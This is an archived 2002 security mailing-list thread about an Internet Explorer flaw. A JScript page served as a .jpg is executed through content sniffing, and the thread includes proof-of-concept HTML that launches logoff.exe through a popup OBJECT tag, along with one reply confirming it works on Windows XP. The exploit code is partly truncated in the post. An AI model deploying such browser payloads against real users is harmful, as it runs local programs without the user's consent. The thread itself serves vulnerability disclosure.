Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Rather large MSIE-hole

From: "foo BAR" <int0x80 () hotmail com>
Date: Wed, 13 Mar 2002 03:21:16 +0000
You have to paste in the whole code. Maybe your email filters it out?
On hotmail it just appears as
function Filtered()
{
return 0;
}
in the source code.
However in the reply it was printed fine.

Look at the bottom, it should be printed fine.




From: "Jon Zobrist" <kgb () ussr com>
To: "Magnus Bodin" <magnus () bodin org>, <vuln-dev () securityfocus com>
Subject: Re: Rather large MSIE-hole
Date: Tue, 12 Mar 2002 12:50:04 -0700
MIME-Version: 1.0
Received: from [66.38.151.27] by hotmail.com (3.2) with ESMTP id MHotMailBE580BF100B9400431514226971B917F0; Tue, 12 Mar 2002 19:01:13 -0800 Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19])by outgoing.securityfocus.com (Postfix) with QMQPid 46396A5884; Tue, 12 Mar 2002 13:09:25 -0700 (MST) 
Received: (qmail 28250 invoked from network); 12 Mar 2002 19:53:20 -0000
From vuln-dev-return-3096-int0x80 Tue, 12 Mar 2002 19:01:54 -0800
Mailing-List: contact vuln-dev-help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <vuln-dev.list-id.securityfocus.com>
List-Post: <mailto:vuln-dev () securityfocus com>
List-Help: <mailto:vuln-dev-help () securityfocus com>
List-Unsubscribe: <mailto:vuln-dev-unsubscribe () securityfocus com>
List-Subscribe: <mailto:vuln-dev-subscribe () securityfocus com>
Delivered-To: mailing list vuln-dev () securityfocus com
Delivered-To: moderator for vuln-dev () securityfocus com
Message-ID: <001501c1c9ff$6d2613e0$6a01010a () bluffdale iaccess com>
References: <20020312103220.GM29695 () bodin org>
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

I copied the included text, pasted it into bad.jpg on my apache box, called
the page from my IE and got the message
You should feel lucky if you dont have XP right now.

I'm running Windows XP Pro, IE Version 6.0.2600.0000.xpclient.010817-1148

Installed patches/hotfixes:
Windows XP Application Compatibality Update[Q313484]
Windows XP Hotfixes for Q307869, Q308210, Q309521, Q309691, Q310437,
Q311889, Q314147, Q3150000

-Jon Zobrist, CISSP

----- Original Message -----
From: "Magnus Bodin" <magnus () bodin org>
To: <vuln-dev () securityfocus com>
Sent: Tuesday, March 12, 2002 3:32 AM
Subject: Rather large MSIE-hole


>
> The latest MSIE-hole is now spreading.
>
> THE ATTACHED HTML-code is served as a jpeg-file, and as MSIE ignores the
> Content-Type if it "thinks" it knows better, then the code is executed.
> This in combination with the malicious code that is possible to run, then 
> an "innocent.jpg" with the following content will log off an XP-user.
>
> --%< cut here-----
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
> <HTML>
> <HEAD>
> <TITLE>IE6 security...</TITLE>
>
> <META http-equiv=Content-Type content="text/html; charset=windows-1252">
> <SCRIPT language=JScript>
>
> var programName=new Array(
>     'c:/windows/system32/logoff.exe',
>     'c:/winxp/system32/logoff.exe',
>     'c:/winnt/system32/logoff.exe'
> );
>
> function Init(){
>     var oPopup=window.createPopup();
>     var oPopBody=oPopup.document.body;
>     var n,html='';
>     for(n=0;n<programName.length;n++)
>         html+="<OBJECT NAME='X'
> CLASSID='CLSID:11111111-1111-1111-1111-111111111111' C
>     oPopBody.innerHTML=html;
>     oPopup.show(290, 390, 200, 200, document.body);
> }
>
> </SCRIPT>
> </head>
> <BODY onload="Init()">
> You should feel lucky if you dont have XP right now.
> </BODY>
> </HTML>
> --%< cut here-----
>
>
> --
> magnus                               MICROS~1 BOB was written in Lisp.
>             http://x42.com/
>






_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
Previous By Date Next
Previous By Thread Next

Current thread: